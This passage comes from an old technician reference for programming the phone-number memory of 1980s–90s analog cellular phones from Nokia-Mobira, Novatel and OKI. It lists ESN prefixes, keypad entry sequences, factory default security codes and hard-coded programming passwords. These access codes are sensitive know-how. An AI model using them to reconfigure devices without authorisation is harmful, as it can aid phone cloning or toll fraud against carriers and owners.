                           "IdEnt IF InFO Pri" will display
                           Press END key to step through parameters
                           To toggle parameters, press SND
                           Once Last parameter is entered and END key is
                           pressed, the information is stored in the NAM

Programming Sequence for 2nd NAM:
                           Enter Programming Mode described above
                           "IdEnt ID InFO Pri" will display
                           Press SND to toggle to second NAM
                           "IdEnt ID InFO OPT" will display
                           Press END, "OPt InFO EnABLEd" appears
                           Press END key to step through parameters and
                            program as outlined above.

                     # of digits
               System ID:  5    XXXXX
 Access Method (MIN Opt):  1    1
               Local Use:  1    1
            Phone Number:  10   XXX-XXX-XXXX
           Station Class:  2    08
    Initial Page Channel:  3   333 or 334
         Access Overload:  2    XX
        Preferred System:  1    A or B (SND to toggle)
                Group ID:  2    XX
           Security Code:  4    XXXX
       Manufacturer Date:  Can't be changed
       Installation Date:  6    mm/dd/yy

"Prog Done" will appear

     Horn Alert (Option):  SEL + 2 + Turn ignition Off
         New Unlock Code:  SEL + 5 + (5 digit security code) + SEL
                           (Unlock Code Displays) + New 4 digit Unlock Code
                           + SEL

           Select System:  SEL + 1 + 1 + 1 (To Scroll Choices)
                            Both   Standard AB or BA
                            H      Home (A only or B only)
                            Non H  Non-Home (A only or B only)
                            H Sid  Home Only

                           NOKIA MOBIRA M-10
                NAM Type:  EEPROM
            Manufacturer:  NOKIA MOBIRA
               Pogrammer:  Phone Handset or Service Handset
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes, either a match or subtract 737856
                            from serial number for ESN.
    Handset Programmable:  Yes, previded lock code is known
      Number of Channels:  832

    Programming Sequence:  Power On
  Enter Programming mode:  * 17 * 3001 * XXXX *
                            XXXX=1234 (new phones) else
                            XXXX=current unlock code
                           Once last item is entered then phone is returned to
                            normal operations SEL button increments steps.

                      # of Digits
               System ID:  5    XXXXX
              MIN Option:  1    1
               Local Use:  1    1
            Phone Number:  10   XXX-XXX-XXXX
           Station Class:  2    08
  Initial Paging Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
             Unlock Code:  4    XXXX

              Horn Alert:  SEL + 2
         New Unlock Code:  NAM
           System Select:  SEL + 1 + 1 + 1 etc... (following will appear)
                            A  A only
                            B  B only
                            S  AB or BA
                            H  Home

Press CLR to exit

                         NOKIA-MOBIRA P-30 Portable
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  Keypad or Service adaptor
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes, provided security code is known.
      Number of Channels:  832

    Programming Sequence:  Power on
                           Enter Access Code
                           * + 17 + * + 2001 + * + XXXXX + *
                            XXXXX=12345 from factory else
                            XXXXX=current security code
                           HO-Id should appear in display
                           Press SEL to enter data and increment
                           Phone automatically writes NAM information
                            upon completion of final step

                      # of digits
               System ID:  5    XXXXX
              MIN Option:  1    1
               Local Use:  1    1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    10
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
           Security Code:  5    XXXXX

         New Unlock Code:  SEL + 75 + 5 digit security code (NAM) + CLR
                           new 4 digit unlock code

          Sytstem Select:  SEL + 1 + 1 + 1 + etc.. (following will appear)
                            S  Standard AB or BA
                            A  A only
                            B  B Only
                            H  Home

Display will clear in two seconds.

                   NOKIA MOBIRA P4000 & PT-612 Portable
                NAM Type:  EEPROM
            Manufacturer:  NOKIA MOBIRA
              Programmer:  Keypad (provided current security code is known.
                           If not, service adaptor is necessary to access
                           program parameters)
          ESN Prefix DEC:  165
                     HEX:  A5
      Number of Channels:  832

    Programming Sequence:  Power On
      Enter Program Mode:  * + 3001 + # + XXXXX + SEL + 9 + END
                            XXXXX=12345 (new phones) else
                            XXXXX=current security code
                            "IDENTIF INFO PRI" will display (Press SND to
                             toggle "on' if necessary)
                            Press END to step through parameters
                            To toggle parameters, press SND
                            Once programming is complete, power phone Off
                             then ON to exit program mode

                        # of digits
                System ID:  5    XXXXX + END
  Access Method (MIN Opt):  1    1 + END
                Local Use:  1    1 + END
            Mobile Number:  10   XXX-XXX-XXXX + END
            Station Class:  2    10 + END
   Initial Paging Channel:  3    333 or 334 + END
         Preferred System:  1    (A or B) + END (SND to toggle)
                 Group ID:  2    XX + END
            Security Code:  5    XXXXX+ END
            Serial Number:  Press END
        Manufacturer Date:  Press END
        Installation Date:  6    mm/dd/yy + END

   Programming Second NAM:  With "IDENTIF INFO PRI" on display,
                            press SND to toggle to "IDENTIF IBFO OPT"
                            Enter information for steps 1-13 for the 2nd NAM
                            Power Phone OFF and ON to complete the program

          New Unlock Code:  SEL + 5 + 5 digit security code (NAM)
                            (Current Unlock Code will display) + new
                            4 digit Unlock Code + SEL

            System Select:  SEL + 1 + 1 + 1 + etc.. (to scroll choices)
                            Home, A, B, Both AB or BA

                          NOVATEL VTR-8300/9300
                NAM Type:  EEPROM
            Manufacturer:  NOVATEL
              Programmer:  Handset
          ESN Prefix DEC:  142
                     HEX:  8E
 ESN, S/N Match Required:  No
    Handset Programmable:  Yes
      Number of Channels:  666 or 832

    Programming Sequence:  Power On
              Lock Phone:  FCN + 1
  Enter Programming Mode:  # + 259
                           ESN will display
                           Press Vol UP Button to increment or
                           Vol DN to decrement
                           Enter data for each step then press SND after each
                           Press END to write NAM information

                       # of Digits
           Mobile Number:  10   XXX-XXX-XXXX
               System ID:  5    XXXXX
  Initial Paging Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
  Initial Paging Channel:  3    333 (A)
  Initial Paging Channel:  3    334 (B)
     Data Scanning Table:  1    1
            Lock Code(1):  4    XXXX
    (see owner's manual)
            Lock Code(2):  4    XXXX
    (see owner's manual)
Invalid ID (System ID
     should not roam on):  5    XXXXX
Local Use -SND to toggle:  SET
EX (MIN Opt) -
           SND to toggle:  SET
Preferred System -
           SND to toggle:  SET (A) or CLR (B)
NonPreferred System Roam:  CLR
   End-to-End Signalling:  SET
Fast Dial &
        Manual Fast Dial:  Press SND to toggle
         Set DTMF length:  Press SND to toggle

                  NOVATEL 8305 (EXCLUDING CA08 SOFTWARE)
                NAM Type:  EEPROM
            Manufacturer:  NOVATEL
              Programmer:  Handset
          ESN Prefix DEC:  142
                     HEX:  8E
 ESN, S/N Match Required:  No
      Number of Channels:  832
    Programming Sequence:  Power
              Lock Phone:  FCN + 1
  Enter Programming Mode:  # + 259
                           Press Vol Up to view Software version and ESN in Hex
                           Press Vol Up to increment and Vol Dn to decrement
                           Enter data for each step then press SND after each
                           Press END to write NAM information

                       # of digits
           Mobile Number:  10   XXX-XXX-XXXX
Initialize Memory
               Locations:  SND (then wait)
               System ID:  5    XXXXX
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
    Initial Page Channel:  Preset Vol Up (A)
    Initial Page Channel:  Preset Vol UP (B)
     Data Scanning table:  Preset
          Full Lock Code:  Preset/Handset
    Restricted Lock Code:  Preset/Handset
            Invalid ID 1:  5    XXXXX
            Invalid ID 2:  5    XXXXX
            Invalid ID 3:  5    XXXXX
            Invalid ID 4:  5    XXXXX

(*) If phone has CA06 software or lower, phone can be programmed 3 times
To program phone a 4th time, there are 2 options:
 #1 - Upgrade software to CA07 or newer
 #2 - Reset MIN counter, with service compact control unit
      (available from NOVATEL)

        Local Use - SND to toggle:  SET
     EX (Min Opt) - SND to toggle:  SET
   Preferred System-SND to toggle:  SET (A) or CLR (B)
     Roam Inhibit - SND to toggle:  CLR
     Quick Recall - SND to toggle:  SET
      Quick Store - SND to toggle:  SET
     Wake Up Tone - SND to toggle:  SET
   End-to-End Sig - SND to toggle:  SET
        Fast Dial - SND to toggle:  SET
   Manual Fast Dial-SND to toggle:  SET
   32 digit dialing-SND to toggle:  SET
Call Timer 30 seconds hold on mobile line originated
   calls when SET - SND to toggle:  CLR
Call Timer 30 second hold on land line orginated calls
         when SET - SND to toggle:  CLR
Call Timer round up next minute when SET
                  - SND to toggle:  SET
         No Land-to-Mobile Option:  CLR (for europe only)
       Horn Alert - SND to toggle:  SET
On-Line Diagnostics -
                    SND to toggle:  SET

                        NOVATEL 8305 (CA08 SOFTWARE)
                NAM Type:  EEPROM
            Manufacturer:  NOVATEL
              Programmer:  Handset
          ESN Prefix DEC:  142
                     HEX:  8E
 ESN, S/N Match Required:  Yes
      Number of Channels:  832
    Programming Sequence:  Power On
              Lock Phone:  FCN + 1
   Enter Programmig Mode:  # + 259
                           Press Vol Up to view Software version and ESN in Hex
                           Press Vol Up to increment and Vol Dn to decrement
                           Enter data for each step then press SND after each
                           Press END to write NAM information

Initialize Memory
               Locations:  SND (then wait)
               System ID:  5    XXXXX
           Mobile Number:  10   XXX-XXX-XXXX
          Full Lock Code:  Preset/Handset
    Restricted Lock Code:  Preset/Handset
EX (MIN Opt) - SND to
                  toggle:  SET
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
    Initial Page Channel:  Preset Vol Up(A)
    Initial Page Channel:  Preset Vol Up(B)
     Data Scanning Table:  Preset 1
            Invalid ID 1:  5    XXXXX
            Invalid ID 2:  5    XXXXX
            Invalid ID 3:  5    XXXXX
            Invalid ID 4:  5    XXXXX

        Local Use - SND to toggle:  SET
 Preferred system - SND to toggle:  SET (A) or CLR (B)
     Roam Inhibit - SND to toggle:  CLR
              Manufacturer Option:  CLR
       Quick Recall-SND to toggle:  SET
       Quick Store -SND to toggle:  SET
       Wake Up Tone-SND to toggle:  SET
     End-to-End Sig-SND to toggle:  SET
        Fast Dial - SND to toggle:  SET
 Manual Fast Dial - SND to toggle:  SET
 32 Digit Dialing - SND to toggle:  SET
Call Timer 30 second hold on mobile originated calls
         when SET - SND to toggle:  SET
Call Timer round up to next minute when SET - SND
                        to toggle:  SET
         No Land-to-Mobile Option:  CLR
       Horn Alert - SND to toggle:  SET
On-Line diagnostics - SND to toggle:  SET

                    NOVATEL 8320 (Includes Hp-3000 Series)
                NAM Type:  EEPROM
            Manufacturer:  NOVATEL
              Programmer:  Handset
          ESN Prefix DEC:  142
                     HEX:  8E
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Phone On
              Lock Phone:  FCN + 1 + SND
      Enter Program Mode:  # + 259
                           Software Version will display
                           Press Vol Up to view ESN
                           Press Vol Up to and select NAM (0-4)
                            0=Parameters common to all NAMs
                            1=NAM 1, 2=NAM 2, 3=NAM 3, 4=NAM 4
                           (Recommend - Press NAM 0 First)
                           If a number is entered for a parameter, press SND
                            to enter information
                           If a parameter is toggled, press SND to toggle
                           Once the parameter is entered, press Vol Up to
                            view the next step
                           To perform programming, press END (END will also
                            allow access to tamperproof protection and NAM

(If "View NAM Only" appears, the tamperproff portection has been enabled and
the phone's 6 digit security code must be entered continue)

                        # of Digits
Initialize memory Locations:  Press SND-Wait + Vol UP
             Full Lock Code:  Preset/Handset + Vol UP
       Restricted Lock Code:  Preset/Handset + Vol UP
      9 Number Quick Recall:  Set (SND to toggle) + Vol UP
       9 Number Quick Store:  Set (SND to toggle) + Vol UP
        Initialization Tone:  Set (SND to toggle) + Vol UP
Call Timer 30 seconds hold on mobile orignated calls when
  SET - Press SND to toggle:  CLR + Vol UP
Call Timer 30 seconds hold on land line originated calls when SET
      - Press SND to toggle:  CLR + Vol UP
Call timer round up to next minute when SET -
        Press SND to toggle:  SET + Vol UP
End-to-End Signalling- Press SND to toggle:  SET + Vol UP
No Land to Mobile Option-disables call timer
         for incoming calls:  CLR + Vol UP
Horn Alert - Press SND to toggle:  SET + Vol UP
On-Line Diagnostics-Press SND to toggle:  SET + Vol UP

Press END to return to NAM select, Additional Program Parameters or
Tamperproof Proteciton

                       NOVATEL AURORA 100 & 200 SERIES
                NAM Type:  Tri-State
            Manufacturer:  Novatel
              Programmer:  Curtis or Bytek
          ESN Prefix DEC:  142
                     HEX:  8E
 ESN, S/N Match Required:  No
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
        System ID Format:  XXXX
       Horn Alert Option:  1
        Handsfree Option:  0 (1 if equipped)
   End-to-End Signalling:  1
        Repertory Option:  1
         Group ID Format:  XX
   Access Overload Class:  XX
           Station Class:  0000 (Binary) or 00 (Dec)
        Local Use Option:  1
              MIN Option:  1
  Initial Paging Channel:  333 or 334
        Preferred System:  0 (B)  or 1 (A)

(*) This NAM must be programmed with the Curtis or Bytek Program because
NOVATEL uses a differen method of determining the NAM checksum than the
Motorola 1801

              Horn Alert:  FCN/PWR + HRN/SND
         New Unlock Code:  NAM
           System Select:  N/A

Display ENS (in Hex)

   Aurora and 100 Series:  FCN + LCK + 259 (with 1 second)
                           "Debug" will be displayed + CLR + #
              200 Series:  FCN + LCK + # + 185
                           (Scroll with Volume control)

                                OKI CS1
                NAM Type:  Tri-State
            Manufacturer:  OKI
              Programmer:  Motorola 1801 or Curtis
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes, (after date code 427A XXXX)
                           (427=Week 27 of 1984)
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled (Enabled if equipped)
        Local Ude Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

Hex Address             B7           B0
    13                  0 0 0 0 X X X 1

Hex Address 13 - B0  Call Timer
                 B1  Total Lock
                 B2  Home System Only
                 B3  Manual System Select

            Horn Select:  HORN
        New Unlock Code:  NAM
          System Select:  N/A

                                OKI 21 & 23
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Handset
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Step #1 First Time Program Only
                           Program Dealer Password
                           Power On
                           Press * and # simultaneously-then release
                           Enter the first time password:  *12345678#
                           Display will show "enter PW-STO"
                           Enter New 10 digit password + STO
                            (recommend 1234567890)
                           Display will show "re-enter PW-STO"
                           Re-Enter 10 digit password (1234567890) + STO
                           This step restricts programming by those not
                            aware of current password

Step #2 Programming New or Used Phone
                           Power On
                           Press STO and RCL (Simulatneously) Release
                           Enter password within 30 seconds of Power On
                            (see first time Program info)
                           Software Version and ESN will display
                           Press CLR to enter program mode
                           Initialize Phone (0+0, "Cleared" will appear)
                           Enter Step number 1-9 and the parameters info
                            for that step
                           After entering each step. Press STO to enter data
                           NAM contents may be scrolled with the
                           Volume Up and DOWN keys

Press CLR to exit programming mode.

                      # of digits
           Mobile Number:  10   XXX-XXX-XXXX + STO
               System ID:  5    XXXXX + STO
  Initial Paging Channel:  4    0333 or 0334 + STO
         Access Overlaod:  2    XX + STO
               Lock Code:  4    XXXX + STO
                Group ID:  2    XX + STO
           Station Class:  4    1000 + STO
              Options(1):  4    11X0 + STO
           Security Code:  6    XXXXXX + STO

Options MIN Opt         Local Use       Handsfree       Spare
        1                   1             0 or 1          0

OKI 21 Phone Operation

              Horn Alert:  N/A
         New Unlock Code:  FUNC + 18 + 6 digit security code (NAM)
      (Current Unlock Code will Display)  + New 4 digit Unlock Code + STO

           System Select:  FUNC + 2 + 6 digit security code (current System
                           setting displays) + 2 + 2 + 2 etc.. (to scroll
                           choices) + STO to enter selection
                                AB or BA
                                A only
                                B only
                                Only SID

Press STO to enter selection

OKI 23 Phone Operation

             Horn Alert:  Menu (3 times) (Until "Review & Set" Displays)
                          + 0 ("Unlock Code Set" displays) + 6 digit security
                          code (Current Unlock Code Displays) + New 4 digit
                          Unlock Code + STO

          System Select:  MENU (3 times) (Until "Review & Set" Displays) +
                          3 (Current System Setting will display) + RCL +
                          RCL + RCL (to Scroll Choices) + STO
                          (To enter Selection)
                                AB or BA
                                A Only
                                B Only
                                Only SId

Press STO to enter selection

     OKI 200, 300 & 400 SERIES (*) MANUFACTURED BEFORE JANUARY 1, 1989 (*)
                NAM Type:  Tri-State
            Manufacturer:  OKI
              Programmer:  Motorola 1801 - CELNAM, Curtis or Bytek
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
    Handset Programmable:  No
      Number of channels:  666 (OKI-400 has 832)

            Phone Number:  XXX-XXX-XXXX
               Lock Code:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
               Handsfree:  Disabled (Enable if Equipped)
               Local Use:  Enabled
   End-to-End Signalling:  Enabled
              Horn Alert:  Enabled
               System ID:  XXXXX
        Preferred System:  A or B
         Access Overload:  XX
                Group ID:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  XX

These series of phones must be initialized after programmig and prior
to being placed in service. To initialize phone follow the steps listed:

         OKI CDL 201/240:  FCN + 9 + 9 + Lock Code + 0 + *

         All other units:  FCN + 9 + 9 + * + Last 8 digits of Mechanical
                           Serial # + *

Pre 811 or 903 software (for 400 series). If phone has later software, see
OKI 400 Series handset programming instructions.

              Horn Alert:  OKI 201    Set- FCN + 91 + *
                                    Clear- FCN + 91 + #
            OKI-Portable:  N/A
            OKI-210, 230, 410, 420, 430, 440, 450, 490
                Set- FCN + 50 + *
              Clear- FCN + 50 + #

New Unlock Code:  OKI 201, 210, 240, 410, 420, 440, 450 & 490:  NAM
                  OKI 230, 300 Portable and 430:
     FCN + 04 + * + Current Unlock Code (NAM) + New Unlock Code (8 digits max)

System Select:  OKI 201 & 240
        FCN + 01 + Unlock Code + X + *
                X=0  Standard (AB or BA)
                X=1  Alternate (BA or AB)
                X=2  A Only
                X=3  B Only
                X=4  Home

OKI 210, 230, 410, 420, 430, 440, 450, 490
 FCN + 01 + * + RCL + RCL + RCL
 (to scroll options)
 Options include:  STD AB or STD BA
                   SCN BA or SCN AB
                   SCN A
                   SCN B
                   SCN HO

Press * to enter selection or CLR to exit without changing sel

                OKI 400 SERIES - WITH 811, 903, or 905 SOFTWARE
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Handset
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  666 (811 software) or 832 (903, 904, 905 software)

    Programming Sequence:  Power On
                           Enter Sequence END + RCL + FCN + CLR + SND
              Enter Code:  08693427 (Software 811 or 903)
              Enter Code:  39061875 (Software 904 or 905)
                           (904/905 used in CHEVROLET Transportable)
                           Code must be entered within 10 seconds of power on
                           CLR can be used to erase a mistake in input
                           After inputting data for a specific location,
                           press # to enter, then press * to increment
                           Press END to write NAM information

                     # of Digits
           Mobile Number:  10   XXX-XXX-XXXX + # + *
               System ID:  5    XXXXX + # + *
  Initial Paging Channel:  4    0333 or 0334 + # + *
         Access Overload:  2    XX + # + *
               Lock Code:  3-4  XXX or XXXX + # + *
                Group ID:  2    XX + # + *
           Station Class:  4    0000 (811 software) or 1000 + # + *
             Option Bits:  4    11XX + # + *
Option Bits;
   MIN Option   Local Use       Handsfree       Horn Alert
       1            1             0 or 1           0 or 1

Some of the models with this software were still equipped with NAM socket.
Do _NOT_ attemp to program phone with a NAM if the phone has a 811, 903,
904, or 905 software

              Horn Alert:  FUNC + 50 + * (Activate)
                           FUNC + 50 + # (Deactivate)

         New Unlock Code:  NAM (Most Models)
                           OKI 430:  FUNC + 04 + * + 3-4 digit security code
System Select:  FUNC + 01 + * + RCL + RCL + RCL (Continue pressing RCL
 until one of the following prompts appears)

Press * to enter selection and CLR to exit function

                OKI 610, 630, 691 Transportable & 692 Portable
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Handset
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Power On
                           Press and hold two keys simultaneously once
                            wake up tone has stopped
                           Use RCL and MENU for 630 and 692
                           Use any two number keys for 610 and 691
                           Release depressed keys and enter Password-0008693427
                           Software Version and ESN will display
                            press CLR to enter Program mode
                           Enter Step Number (1 to 9) then enter data
                           Press * (610 & 691) or STORE (630 & 692) to
                            enter each step.
                           Once Data has been entered, the NAM information can
                            be scrolled with the Vol UP or DN key
                           Press CLR + CLR to write NAM information

                      # of Digits
         Mobile Number 1:  10   XXX-XXX-XXXX
             System ID 1:  5    XXXXX
  Initial Paging Channel:  3    XXX
     1 Press * to program 2nd Number (630 and 692 models)
       * Mobile Number 2:  10   XXX-XXX-XXXX
           * System ID 2:  5    XXXXX
  * Initial Page Channel:  3    XXX
         Access Overload:  2    XX
               Lock Code:  4    XXXX
                Group ID:  2    XX
        Station Class(4):  4    1000
              Options(3):  4    11X1
           Security Code:  6    XXXXXX

(3) Options... MIN Option    Local Use    Handsfree     Horn Alert
 0=Disable         1             1         0 or 1           1

(4) Enter Station Class In Binary (1000 Binary = 08 Dec)

         New Unlock Code:  FUNC + 92 + 6 digit Security Code (NAM) +
                            New 4 digit Unlock Code + *
           System Select:  FUNC + 3 + 3 + 3 etc... (to scroll thru selection)
                                 SCN  AB
                                 SCN  BA
                                 SCN  A
                                 SCN  B
                                 SCN  HO
Press * to enter selection

                         OKI 620 & 693 Transportable
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Handset
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Power On
                           After wake up tone has stopped, press and hold the
                           RCL and DUNC keys simultaneously
                           Release depressed keys and enter password: 0008693427
                           Software Version and ESN will display
                           Press CLR to enter Program Mode
                           Enter Step Number (1 to 9) then thru data
                           Press STO to enter each step
                           Once data has been entered, the NAM information
                            can be scrolled with the VOL UP or DN key press CLR
                            + CLR to write NAM information

                      # of Digits
         Mobile Number 1:  10   XXX-XXX-XXXX + STO + VOL DN
             System ID 1:  5    XXXXX + STO + VOL DN
          Initial Paging:  3    XXX + STO + VOL DN
         PRESS * to program 2nd NAM
        *Mobile Number 2:  10   XXX-XXX-XXXX + STO + VOL DN
            *Systen ID 2:  5    XXXXX + STO + VOL DN
        *Init Pag Chan 2:  3    XXX + STO + VOL DN
         Access Overload:  2    XX + STO + VOL DN
               Lock Code:  4    XXXX + STO + VOL DN
        Station Class(4):  4    1000 + STO + VOL DN
              Options(3):  4    11X1 + STO + VOL DN
           Security Code:  6    XXXXXX + STO + VOL DN

(3) Options Step- MIN Option    Local Use     Handsfree     Horn Alert
                      1            1           0 or 1           1
(4) Enter Station Class in Binary (1000 binary = 08 decimal)

          New Unlock Code:  FUNC + 92 + 6 digit security code (NAM) +
                            New 4 digit Unlock Code + STO
           System Select:  FUNC + 3 + 3 + 3 + etc... (to scroll thru selections)
                                SCN  AB
                                SCN  BA
                                SCN  A
                                SCN  B
                                SCN  HOME

Press STO to enter selection

                        OKI 700 Portable & ACC91
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Keypad
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  832

    Programming Sequence:  Power On (wait for beep)
                           Press MENU and RCL simulatenously
                           Enter code 0008693427
                           ESN will appear in HEX and Software Version
                           Press CLR to enter Program Mode
                           Continue to next step for NAM #1 or Press *
                            to program #2
                           Press STO to store data for each step
                           Press CLR + CLR to write NAM information

                      # of Digits
         Mobile Number 1:  10   XXX-XXX-XXXX + STO
             System ID 1:  5    XXXXX + STO
  Initial Page Channel 1:  3    XXX + STO
         Access Overload:  2    XX + STO
               Lock Code:  4    XXXX + STO
                Group ID:  2    XX + STO
        Station Class(1):  4    1000 (ACC91) + STO
                                1010 (700 Port) + STO
              Options(2):  4    XXXX + STO
           Security Code:  6    XXXXX + STO

         New Unlock Code:  MENU + Vol Up or Down keys until "Unlock Code Set"
        appears Enter 6 digit Security code + new 1-8 digit unlock code + STO
           System Select:  MENU + Vol Up or Down keys until "System" displays.
                           Repeatedly press RCL to scroll selections.
                                Prefer B
                                Prefer A
                                System A
                                System B
                                Home Only
                                Only SID
Press STO to enter selection

                             OKI 710 Portable
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Keypad
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Program Dealer Password first
                           Press * and # simultaneously then enter *12345678#
                           Enter 10 digit dealer password
                           (Recommened to use 1234567890)
                           Press STO to enter password into memory
                           Unit will request you to enter password again
                           Enter programmed Dealer password + STO

   Programming the Phone:
                           Power On
                           Press FUNC and RCL simultaneously then release
                           Enter Dealer Password (See Part I)
                          (Password must be entered with 30 seconds of Power On)
                           Software Version will display
                           "Spd Dial Mem Clear" then "To Reset Press 0" will
                           Press 0 to clear memory locations
                            (or CLR to pass this step)
                           "Default Data Set" then "To Reset Press 0" will
                           Press 0 to reset phone options (or CLR to skip)
                           "NAM 1" then "OWN#" will display
                           After each parameter is entered, press
                           STO to enter data then Vol Down to increment
                           Press CLR to exit (This also allows access to NAM 2)
                           Repeatedly press CLR to exit Program Mod

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX + STO + VOL DN
               System ID:  5    XXXXX + STO + VOL DN
  Initial Paging Channel:  4    0333 or 0334 + STO + VOL DN
         Access Overload:  2    XX + STO + VOL DN
             Unlock Code:  4    XXXX + STO + VOL DN
                Group ID:  2    XX + STO + VOL DN
           Station Class:  4    1010 (10d) + STO + VOL DN
              Options(1):  4    11X0 + STO + VOL DN
           Security Code:  6    XXXXXX + STO + VOL DN

Options(1):  MIN Options   Local Use   Handsfree  Not used
                 1             1         0 or 1      0

         New Unlock Code:  FUNC + 14 + 6 digit security code (Current
     Unlock Code displays) + New 4 digit unlock Code + STO + CLR (to exit)

           System Select:  FUNC + 12 + 6 digit security code + Repeatedly
                           press 2 to scroll choices;
                                  B Only
                                  A Only
                                  Only SID

Press STO to enter selection
Press CLR (to exit)

                             OKI 750 Portable
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Keypad
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes
      Number of Channels:  832

    Programming Sequence:  Program Dealer Password First
                           Press * and # simultaneously then enter *12345678#
                           Enter 10 digit Dealer password
                           (Recommended to use 1234567890)
                           Press STO to enter password into memory
                           Unit will request you enter password again
                           Enter programmed Dealer password

   Programming the Phone:
                           Power On
                           Press MENU and RCL simultaneously then release
                           Enter Dealer Password (see above)
                           (Password must be entered within 30 seconds of power
                           Software Version and ESN will display "Spd Dial Mem
                            Clear" then "To Reset Press 0" will display
                           Press 0 to Clr Mem Locations (or CLR to pass this
                           "Default Data Set" then "To Reset Press 0" will
                           "NAM 1" then "OWN#" will display
                           After each parameter is entered, press STO to enter
                            data then
                           VOL DOWN to increment
                           Press CLR to exit (this also allows access to NAMs
                           Repeatedly press CLR to exit Program Mode

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX + STO + VOL DN
               System ID:  5    XXXXX + STO + VOL DN
  Initial Paging channel:  4    0333 or 0334 + STO + VOL DN
         Access Overload:  2    XX + STO + VOL DN
             Unlock Code:  4    XXXX + STO + VOL DN
                Group ID:  2    XX + STO + VOL DN
           Station Class:  4    1010 (10d)
              Options(1):  4    11X0 + STO + VOL DN
           Security Code:  6    XXXXXX + STO + VOL DN

(1) Options:  MIN Options     Local Use    Handsfree    Hot used
                   1              1          0 or 1        0

Programming Sequence (2nd NAM):
                           Press CLR after programming NAM 1
                           Enter Mobile Number #2 + STO + VOL DN
                           Enter System ID #2 + STO + VOL DN
                           Enter Init Paging Channel #2 + STO + VOL DN
                           Press CLR to exit and program #2 + STO + VOL DN
                           Press CLR again to exit program mode

                   OKI 810 MOBILE AND 891 TRANSPORTABLE
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Handset
          ESN Prefex DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes (129 + 0 + Last seven digits of serial #)
    Stamped Model Number:  UM9023
      Number of Channels:  832

    Programming Sequence:  Power Off
                           Power On
                           Press and hold RCL and FUNC keys simultaneously once
                            wake up tone has stopped Release depressed keys and
                            enter Password *12345678#
                           "Enter New PW & STO" will display
                           (Recommended number (1234567890)
                           Enter Password + STO
                           Re-Enter Password + STO
                           Phone automatically steps to Program mode.

Programming A Used Phone:  Power Off
                           Power On
                           Press and hold RCL andFUNC keys simultaneously once
                            wake tone has stopped
                           Release depressed keys and enter Password
                           (Enter Password within 30 seconds)
                           ESN and Serial Number will display
                           SPD Dial displays - Press 0 to clear or CLR to
                           Default Data Displays-Press 0 to clear or CLR to
                           SSN Displays (N/A) Press 0 to increment "Phon" appear
                           Enter data for each step and press STO + Vol UP
                            or DOWN to increment
                           Once data has been entered, the NAM information
                            can be scrolled with the Vol UP or Down Key.

Press CLR to exit Program Mode

                      # of Digits
           Mobile Number:  10   XXX-XXX-XXXX
               System ID:  5    XXXXX
  Initial Paging Channel:  4    0333 or 0334
         Access Overload:  2    XX
                Group ID:  2    XX
             Unlock Code:  4    XXXX
        Station class(4):  4    1000
              Options(3):  4    1101
           Security Code:  6    XXXXXX

(3)Options:    MIN Options    Local Use    Not Used    Horn alert
 (0=Disabled)       1             1           0             1

(4) Enter Station Class in binary (1000b = 08d)

New Unlock Code:  FUNC + 16 + 6 digit Security Code (NAM) +
 New 4 digit Unlock Code + STO

System Select:  FUNC + 2 + 6 digit security Code + 2 + 2 + ...etc
 (to scroll thru selections)
          SCN  AB
          SCN  BA
          SCN  A
          SCN  B
          SCN  Ho
          SID  NO. (Enter System ID #)

Press STO to enter selection

                                  OKI 830
                NAM Type:  EEPROM
            Manufacturer:  OKI
